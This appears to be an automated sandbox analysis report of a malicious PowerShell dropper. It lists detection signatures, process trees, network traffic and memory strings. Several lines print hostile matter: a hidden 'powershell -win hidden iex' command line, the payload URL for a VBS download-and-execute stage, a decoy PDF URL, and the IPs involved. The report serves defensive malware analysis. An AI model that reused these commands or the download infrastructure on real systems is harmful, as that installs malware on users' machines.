
Windows Analysis Report
H6epOhxoPY.ps1

Overview

General Information

Sample name: H6epOhxoPY.ps1 (renamed because the original name is a hash value)
Original sample name: 94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6.ps1
Analysis ID: 1578230
MD5: bd912222bc39017ff4cbf8c37d24d889
SHA1: 1a4442b9d56c5b3fb06d38009b5f5d01b7a4a809
SHA256: 94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6
Tags: 185-236-228-9287-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 3284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 4296 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 4280 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6552 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 3284 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 

Source | Rule | Description | Author | Strings
amsi64_3284.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 

      System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3284, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", ProcessId: 5708, ProcessName: powershell.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3284, TargetFilename: C:\Users\Public\txr.vbs
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ProcessId: 3284, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3284, TargetFilename: C:\Users\Public\txr.vbs
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ProcessId: 3284, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6764, ProcessName: svchost.exe
      No Suricata rule has matched


      AV Detection

Source: H6epOhxoPY.ps1 | Avira: detected
Source: H6epOhxoPY.ps1 | Virustotal: Detection: 44%
Source: H6epOhxoPY.ps1 | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.8% probability
Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1554956460.0000011073522000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1554760790.000001107350D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1781902419.000001CA73110000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdbdir=C: source: powershell.exe, 00000000.00000002.1786312887.000001CA733E2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb/ source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7333C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552154954.00000110733B2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdbW source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb56l source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?t.Automation.pdb& source: powershell.exe, 00000003.00000002.1554229305.00000110734B6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: global traffic | HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 203.175.174.69
Source: Joe Sandbox View | IP Address: 107.161.23.150
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: global traffic | HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: www.astenterprises.com.pk
Source: global traffic | DNS traffic detected: DNS query: www.bluemaxxlaser.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 19 Dec 2024 11:50:46 GMT | Server: Apache | Content-Length: 315 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://astenterprises.com.pk
Source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552470227.00000110733E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: svchost.exe, 00000008.00000002.2706498999.00000268AD400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.astenterprises.com.pk
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B342000.00000004.00000800.00020000.00000000.sdmp, H6epOhxoPY.ps1 | String found in binary or memory: http://www.bluacmmaxxlasacmr.com/ms/ms.vbs
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CC94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
Source: powershell.exe, 00000000.00000002.1784369442.000001CA73230000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coiY
Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1632205416.00000268AD210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5BD42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1781902419.000001CA7318E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.coB3
Source: powershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CBF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List
Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engine | Classification label: mal84.evad.winPS1@20/59@5/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xopxzox1.tww.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: H6epOhxoPY.ps1 | Virustotal: Detection: 44%
Source: H6epOhxoPY.ps1 | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown (reported 2 times)
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown (reported 6 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
